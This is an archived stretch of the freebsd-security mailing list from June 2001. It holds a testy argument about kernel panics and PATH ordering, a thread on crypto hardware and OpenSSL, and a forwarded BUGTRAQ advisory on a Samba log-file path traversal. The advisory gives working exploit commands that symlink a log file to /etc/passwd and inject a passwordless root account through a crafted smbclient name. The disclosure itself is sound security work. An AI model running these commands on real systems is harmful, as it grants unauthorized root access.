tedm@toybox.placo.com) Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154]) by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f5OGK3l93560; Sun, 24 Jun 2001 09:20:04 -0700 (PDT) (envelope-from tedm@toybox.placo.com) From: "Ted Mittelstaedt" To: Cc: , , , Subject: RE: Kernel Panic Date: Sun, 24 Jun 2001 09:20:03 -0700 Message-ID: <006001c0fcc9$86301ce0$1401a8c0@tedm.placo.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Importance: Normal In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >-----Original Message----- >From: des@ofug.org [mailto:des@ofug.org] >Sent: Sunday, June 24, 2001 8:57 AM >To: Ted Mittelstaedt >Cc: js43064n@pace.edu; freebsd-questions@FreeBSD.ORG; >freebsd-stable@FreeBSD.ORG; freebsd-security@FreeBSD.ORG >Subject: Re: Kernel Panic > > >"Ted Mittelstaedt" writes: >> That would be impossible unless you had "." in your path. If >> you did (which is a very BAD thing) then yes your script probably >> loaded itself (assuming you named it "pine). This is why the >> system defaults to NOT having "." in the path. > >No: 1) he simply had the script, named "pine", in a directory that was >in his search path (e.g. $HOME/bin), That's a case I hadn't thought of - however, "local" search paths should generally be at the END of the user's path, not the beginning, in which case the system binary gets called first. Both cases are bad practice, and shouldn't be present on a normal system. > >Yes it is, unfortunately. FreeBSD doesn't like running out of swap >space. Matt Dillon has been trying to correct this in -CURRENT, but >it's not completely fixed yet. > I think in that situation you would have to have a swap partition that's smaller than the maximum amount of ram that a normal user is permitted to allocate - in that case the limits are set too high. Ted Mittelstaedt tedm@toybox.placo.com Author of: The FreeBSD Corporate Networker's Guide Book website: http://www.freebsd-corp-net-guide.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:21: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id F044D37B407; Sun, 24 Jun 2001 09:20:55 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id SAA82714; Sun, 24 Jun 2001 18:20:54 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Karsten W. Rohrbach" Cc: Soren Kristensen , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Status of encryption hardware support in FreeBSD References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de> From: Dag-Erling Smorgrav Date: 24 Jun 2001 18:20:53 +0200 In-Reply-To: <20010624181007.C52432@mail.webmonster.de> Message-ID: Lines: 23 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Karsten W. Rohrbach" writes: > i think ipsec crypto abstraction into hardware is one side of the medal, > but the other side -- to be polished first -- ist getting openssl onto > the iron. What you're basically trying to say is that you want a userland interface to the crypto hardware, so that OpenSSL can take advatange of it if it's present? > as i said, there is a 3.x freebsd driver, would this help? > i am not into writing drivers ;-) Allow me to repeat myself: "driver source does not constitute adequate documentation. It helps, but it's neither sufficient nor necessary." A 3.x driver *could* be ported forward to 4.x and 5.x, but the required changes are not trivial (newbus, SMPng...) and you'd still need sample boards for testing and debugging, and docs for reference when you don't understand what the existing driver is trying to do. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:22:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15]) by hub.freebsd.org (Postfix) with ESMTP id 1F2E737B405; Sun, 24 Jun 2001 09:22:42 -0700 (PDT) (envelope-from tedm@toybox.placo.com) Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154]) by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f5OGMbl93571; Sun, 24 Jun 2001 09:22:37 -0700 (PDT) (envelope-from tedm@toybox.placo.com) From: "Ted Mittelstaedt" To: Cc: , , , Subject: RE: Kernel Panic Date: Sun, 24 Jun 2001 09:22:37 -0700 Message-ID: <006101c0fcc9$e1a84020$1401a8c0@tedm.placo.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Importance: Normal In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >-----Original Message----- >From: des@ofug.org [mailto:des@ofug.org] >Sent: Sunday, June 24, 2001 8:57 AM > > >Yes it is, unfortunately. FreeBSD doesn't like running out of swap >space. Matt Dillon has been trying to correct this in -CURRENT, but >it's not completely fixed yet. > One other thing - the recursive script the user originally posted does not appear to consume all free swap in the system. I still maintain he has a hardware error in the disk system. Ted Mittelstaedt tedm@toybox.placo.com Author of: The FreeBSD Corporate Networker's Guide Book website: http://www.freebsd-corp-net-guide.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:25:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id B2FDD37B405; Sun, 24 Jun 2001 09:25:09 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id SAA82755; Sun, 24 Jun 2001 18:25:05 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Ted Mittelstaedt" Cc: , , , Subject: Re: Kernel Panic References: <006001c0fcc9$86301ce0$1401a8c0@tedm.placo.com> From: Dag-Erling Smorgrav Date: 24 Jun 2001 18:25:05 +0200 In-Reply-To: <006001c0fcc9$86301ce0$1401a8c0@tedm.placo.com> Message-ID: Lines: 22 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Ted Mittelstaedt" writes: > That's a case I hadn't thought of - however, "local" search paths should > generally be at the END of the user's path, not the beginning, in which case > the system binary gets called first. No! Local paths should be at the beginning, so local binaries (wrappers etc.) can ovverride system binaries. > Both cases are bad practice, and shouldn't be present on a normal system. Bollocks. > I think in that situation you would have to have a swap partition that's > smaller than the maximum amount of ram that a normal user is permitted to > allocate - in that case the limits are set too high. That, or the limits simply don't account for all the resources a user can consume, as is the case with mmap(). DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:26:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 0006F37B401; Sun, 24 Jun 2001 09:26:37 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id SAA82771; Sun, 24 Jun 2001 18:26:34 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Ted Mittelstaedt" Cc: , , , Subject: Re: Kernel Panic References: <006101c0fcc9$e1a84020$1401a8c0@tedm.placo.com> From: Dag-Erling Smorgrav Date: 24 Jun 2001 18:26:33 +0200 In-Reply-To: <006101c0fcc9$e1a84020$1401a8c0@tedm.placo.com> Message-ID: Lines: 11 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Ted Mittelstaedt" writes: > One other thing - the recursive script the user originally posted does not > appear to consume all free swap in the system. I still maintain he has a > hardware error in the disk system. A disk error would not crash the system. Please stop spouting unfounded (though highly imaginative) bullshit. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:31:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id A83F537B407 for ; Sun, 24 Jun 2001 09:31:26 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 54605 invoked by uid 1000); 24 Jun 2001 16:31:47 -0000 Date: Sun, 24 Jun 2001 18:31:47 +0200 From: "Karsten W. Rohrbach" To: Dag-Erling Smorgrav Cc: Soren Kristensen , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Status of encryption hardware support in FreeBSD Message-ID: <20010624183147.F52432@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Dag-Erling Smorgrav , Soren Kristensen , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="B0nZA57HJSoPbsHY" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Sun, Jun 24, 2001 at 06:20:53PM +0200 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --B0nZA57HJSoPbsHY Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Dag-Erling Smorgrav(des@ofug.org)@2001.06.24 18:20:53 +0000: > "Karsten W. Rohrbach" writes: > > i think ipsec crypto abstraction into hardware is one side of the medal, > > but the other side -- to be polished first -- ist getting openssl onto > > the iron. >=20 > What you're basically trying to say is that you want a userland > interface to the crypto hardware, so that OpenSSL can take advatange > of it if it's present? yup, exactly. to me it seems to be a major problem to get some unified api out of openssl adressing fucnctions on the hardware -- i simply do not know how other crypto chipsets do it, i just investigated the rainbow board. they got a patch against openssl 0.9.5 i think, that glues in the driver calls instead of standard lib functions. >=20 > > as i said, there is a 3.x freebsd driver, would this help? > > i am not into writing drivers ;-) >=20 > Allow me to repeat myself: "driver source does not constitute adequate > documentation. It helps, but it's neither sufficient nor necessary." yes yes yes ;-) you are perfectly right here. i just wanrted to mention that there is an _existant_ driver and patch against the openssl lib, also some test programs to look if the driver works, for freebsd 3.x. > A 3.x driver *could* be ported forward to 4.x and 5.x, but the > required changes are not trivial (newbus, SMPng...) and you'd still > need sample boards for testing and debugging, and docs for reference > when you don't understand what the existing driver is trying to do. sure. my impression with the rainbow guys was, that they are very open to the opensource community. they supplied a board, (user) docs and the unreleased driver/openssl code to us and i was very impressed about their attitude towards people hacking up their stuff *grin*. alas, i quit the company and i did not even start really hacking on the code to take it to a place even near to production. i see from their web page, that they now support freebsd 4.1-release, so it sounds rather appealing to me... /k --=20 > Captain Hook died of jock itch. KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --B0nZA57HJSoPbsHY Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7NhXzM0BPTilkv0YRAsndAJ9N8aGLN2PqQ9JnBnKtyOGQ/uiTzQCgw88h Js4cenYHfd03bh5Hb2wgQ7s= =BUvX -----END PGP SIGNATURE----- --B0nZA57HJSoPbsHY-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:38:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id A0D4C37B401; Sun, 24 Jun 2001 09:38:33 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id SAA82832; Sun, 24 Jun 2001 18:38:31 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Karsten W. Rohrbach" Cc: Soren Kristensen , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Status of encryption hardware support in FreeBSD References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de> <20010624183147.F52432@mail.webmonster.de> From: Dag-Erling Smorgrav Date: 24 Jun 2001 18:38:31 +0200 In-Reply-To: <20010624183147.F52432@mail.webmonster.de> Message-ID: Lines: 21 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Karsten W. Rohrbach" writes: > yup, exactly. to me it seems to be a major problem to get some unified > api out of openssl adressing fucnctions on the hardware -- i simply do > not know how other crypto chipsets do it, i just investigated the > rainbow board. they got a patch against openssl 0.9.5 i think, that > glues in the driver calls instead of standard lib functions. Can you dig out this patch for me? It would be a big win if the userland interface to Soren's hardware were compatible with Rainbow's driver. > yes yes yes ;-) you are perfectly right here. i just wanrted to mention > that there is an _existant_ driver and patch against the openssl lib, > also some test programs to look if the driver works, for freebsd 3.x. This would be useful for ensuring compatibility with Rainbow's stuff, especially if, as you say, they have a 4.1 version out now. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:43:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id E12CA37B405; Sun, 24 Jun 2001 09:43:34 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id JAA14358; Sun, 24 Jun 2001 09:43:34 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda14356; Sun Jun 24 09:43:26 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.4/8.9.1) id f5OGhLn24777; Sun, 24 Jun 2001 09:43:21 -0700 (PDT) Received: from UNKNOWN(10.1.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdT24775; Sun Jun 24 09:42:38 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.4/8.9.1) id f5OGgOx31237; Sun, 24 Jun 2001 09:42:24 -0700 (PDT) Message-Id: <200106241642.f5OGgOx31237@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdt31230; Sun Jun 24 09:42:04 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: security-officer@freebsd.org, dwcjr@freebsd.org Cc: freebsd-security@freebsd.org Subject: smbd remote file creation vulnerability (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 24 Jun 2001 09:42:04 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Just received this from BUGTRAQ... Security-officer & dwcjr, this is just a heads up that a Samba patch is coming down the pipe RSN. freebsd-security mailing list users using Samba, FYI. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message [headers removed] Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Precedence: bulk List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 3454 invoked from network); 24 Jun 2001 04:25:44 -0000 X-Authentication-Warning: nimue.bos.bindview.com: lcamtuf owned process doing -bs Date: Sat, 23 Jun 2001 23:24:26 -0400 (EDT) From: Michal Zalewski To: bugtraq@securityfocus.com Subject: smbd remote file creation vulnerability Message-ID: X-Nmymbofr: Nir Orb Buk MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII ** Please hold with approving this one before Monday, if possible. ** This is a forced release. Author: Michal Zalewski Topic: Insufficient parameter validation and unsafe default configuration make numerous systems running samba SMB file sharing daemon vulnerable to remote attacks. Vulnerable platforms: Tested on smbd 2.0.7 shipped with RedHat Linux 7.0 and 7.1. Confirmed on 2.0.8. Overview: Due to insufficient NetBIOS computer name validation in incoming SMB requests, in conjunction with default configuration found for example in RedHat Linux and derivates, samba daemon allows remote attackers to create SMB session log files (*.log) with highly attacker-dependent contents outside outside logs directory. This vulnerability itself can be used to perform DoS attacks, or, if combined with unprivileged local access, can be used to gain superuser privileges. On vulnerable platforms, by default, each SMB session is logged to the file /var/log/samba/.log. If the attacker is connecting from 'FOOBAR', logs would be put in /var/log/foobar.log. Unfortunately, NetBIOS name '../../../evil' would be accepted, as well, creating /evil.log file. This vulnerability is exploitable if the following setting is present in smb.conf file: log file = /var/log/samba/%m.log ...which is default on major Linux distributions, and probably few other platforms, as well. On some systems, configuration might be different: log file = /usr/local/samba/var/log.%m In the second case (e.g. FreeBSD), there is usually no way to exploit this vulnerability. Additionally, as noticed by Mark Loveless, using specific NetBIOS names, like 'non/existing/dir', it is possible to avoid logging of error messages (e.g. authentication failures) at all, which might be very useful for performing brute-force attacks. Note that any non-default configuration not using any prefix or suffix (log- or .log) in log filename would be vulnerable to instant remote compromise. Exploit: This is the scenario of local privilege escalation attack against RedHat 7.x installation: $ ln -s /etc/passwd /tmp/x.log $ smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \ -n ../../../tmp/x -N ...where 'NIMUE' stands for local host name (few error messages should be returned). $ su toor # Explaination of this attack is pretty trivial. Samba daemon tries to access logfile for host introducing itself as '../../../tmp/x'. This translates to open() on /var/log/samba/../../../tmp/x.log. Thus, /tmp/x.log is opened in O_APPEND mode, following previously created symlink to /etc/passwd. Then, anonymous attempt to mount non-existing share named "\ntoor::0:0::/:/bin/sh\n" is logged in /tmp/x.log, or, if you prefer, in /etc/passwd. Error message looks this way: [2001/06/22 14:53:03, 1] smbd/reply.c:reply_sesssetup_and_X(925) Rejecting user 'lcamtuf': authentication failed [2001/06/22 14:53:03, 0] smbd/service.c:make_connection(214) ../../../tmp/x (192.233.133.108) couldn't find service toor::0:0::/:/bin/sh The last line is, obviously, accepted by /bin/su or /bin/login. Fix information: As a temporary workaround, we suggest changing 'log file' setting, as described above. This vulnerability has been confirmed by the vendor, and is addressed there: http://us1.samba.org/samba/whatsnew/macroexploit.html Removing '%m' at all would protect against attackers trying to avoid logging at all. Vendor was informed, fix will be publicly available soon. ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:54:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15]) by hub.freebsd.org (Postfix) with ESMTP id 1E40C37B406; Sun, 24 Jun 2001 09:54:09 -0700 (PDT) (envelope-from tedm@toybox.placo.com) Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154]) by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f5OGs3l93676; Sun, 24 Jun 2001 09:54:04 -0700 (PDT) (envelope-from tedm@toybox.placo.com) From: "Ted Mittelstaedt" To: Cc: , , , Subject: RE: Kernel Panic Date: Sun, 24 Jun 2001 09:54:03 -0700 Message-ID: <006501c0fcce$45fc5080$1401a8c0@tedm.placo.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Importance: Normal In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >-----Original Message----- >From: des@ofug.org [mailto:des@ofug.org] >Sent: Sunday, June 24, 2001 9:25 AM >To: Ted Mittelstaedt >Cc: js43064n@pace.edu; freebsd-questions@FreeBSD.ORG; >freebsd-stable@FreeBSD.ORG; freebsd-security@FreeBSD.ORG >Subject: Re: Kernel Panic > > >"Ted Mittelstaedt" writes: >> That's a case I hadn't thought of - however, "local" search paths should >> generally be at the END of the user's path, not the beginning, >in which case >> the system binary gets called first. > >No! Local paths should be at the beginning, so local binaries >(wrappers etc.) can ovverride system binaries. > I was half-expecting you to say something like that. In response: NO, local wrappers should NEVER be named the same as system binaries because the user then gets used to assuming that the wrapper is in place for all systems Imagine a local wrapper named "rm" that instead of deleting the file puts it in a "garbage pail". You get used to the garbage pail and get sloppy in what you remove - then one day your on another system and do an "rm" without thinking, then realize a mistake, go to the "garbage pail" and find that it doesen't exist. Wahhh!!!! Now, if you are the administrator and you want to wrap a system binary then you do it by renaming the system binary something else, and putting the wrapper in the place the system binary is. But that's not a case of a local binary. >> Both cases are bad practice, and shouldn't be present on a normal system. > >Bollocks. > Bollocks back. If you name your local wrappers your own names then the wrapper works fine if the local path is at the end of the search path. I can see putting the local path at the front for TEMPORARY use - like if you were developing a system binary you wanted to repeatedly test - but you go on a big limb by making a bunch of custom wrappers that duplicate the system binary names. >> I think in that situation you would have to have a swap partition that's >> smaller than the maximum amount of ram that a normal user is permitted to >> allocate - in that case the limits are set too high. > >That, or the limits simply don't account for all the resources a user >can consume, as is the case with mmap(). > OK - but then this is a case where the limiting device is broken. Maybe that should be worked on as well as the swap problem too, no? Ted Mittelstaedt tedm@toybox.placo.com Author of: The FreeBSD Corporate Networker's Guide Book website: http://www.freebsd-corp-net-guide.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:55:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from dannyboy.worksforfood.com (adsl-151-205-126-247.chlstn.adsl.bellatlantic.net [151.205.126.247]) by hub.freebsd.org (Postfix) with ESMTP id 8527737B405 for ; Sun, 24 Jun 2001 09:55:46 -0700 (PDT) (envelope-from dannyboy@worksforfood.com) Received: by dannyboy.worksforfood.com (Postfix, from userid 1000) id 6527C5A551; Sun, 24 Jun 2001 12:56:12 -0400 (EDT) Date: Sun, 24 Jun 2001 12:56:12 -0400 From: Daniel Harris To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@freebsd.org Subject: Re: smbd remote file creation vulnerability (fwd) Message-ID: <20010624125612.A9327@dannyboy.worksforfood.com> References: <200106241642.f5OGgOx31237@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="k1lZvvs/B4yU6o8G" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106241642.f5OGgOx31237@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Sun, Jun 24, 2001 at 09:42:04AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --k1lZvvs/B4yU6o8G Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sun, Jun 24, 2001 at 09:42:04AM -0700, Cy Schubert - ITSD Open Systems G= roup wrote: > Just received this from BUGTRAQ... >=20 > Security-officer & dwcjr, this is just a heads up that a Samba patch is= =20 > coming down the pipe RSN. dwcjr committed the updates to samba (2.0.10 and 2.2.0a) yesterday. =20 -- Daniel Harris=20 --k1lZvvs/B4yU6o8G Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7NhurbGPaBITQ1+cRAn84AJ4tHnCrs94u+CjnKG2v4lvtKXk2QACePyBl TkrVeiN2KmS9q4iWDUFg8eQ= =6i+r -----END PGP SIGNATURE----- --k1lZvvs/B4yU6o8G-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 9:57:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15]) by hub.freebsd.org (Postfix) with ESMTP id 44A6737B407; Sun, 24 Jun 2001 09:57:01 -0700 (PDT) (envelope-from tedm@toybox.placo.com) Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154]) by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f5OGuvl93700; Sun, 24 Jun 2001 09:56:57 -0700 (PDT) (envelope-from tedm@toybox.placo.com) From: "Ted Mittelstaedt" To: Cc: , , , Subject: RE: Kernel Panic Date: Sun, 24 Jun 2001 09:56:56 -0700 Message-ID: <006601c0fcce$ad789fc0$1401a8c0@tedm.placo.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Importance: Normal In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I didn't say "disk error" I said "disk system" and I made a particular point in the first message of saying that such an error is most likely due to a combination of problems with the motherboard and disk. And YES, a disk subsystem error CAN crash the system in fact not only crash it but completely garbage the filesystem in the process. I think your own imagination has run away with you. ;-) Ted Mittelstaedt tedm@toybox.placo.com Author of: The FreeBSD Corporate Networker's Guide Book website: http://www.freebsd-corp-net-guide.com >-----Original Message----- >From: des@ofug.org [mailto:des@ofug.org] >Sent: Sunday, June 24, 2001 9:27 AM >To: Ted Mittelstaedt >Cc: js43064n@pace.edu; freebsd-questions@FreeBSD.ORG; >freebsd-stable@FreeBSD.ORG; freebsd-security@FreeBSD.ORG >Subject: Re: Kernel Panic > > >"Ted Mittelstaedt" writes: >> One other thing - the recursive script the user originally >posted does not >> appear to consume all free swap in the system. I still maintain >he has a >> hardware error in the disk system. > >A disk error would not crash the system. Please stop spouting >unfounded (though highly imaginative) bullshit. > >DES >-- >Dag-Erling Smorgrav - des@ofug.org > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 10:40:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from silky.kgr-sp.si (silky.kgr-sp.si [212.30.95.172]) by hub.freebsd.org (Postfix) with ESMTP id 1835237B401 for ; Sun, 24 Jun 2001 10:40:25 -0700 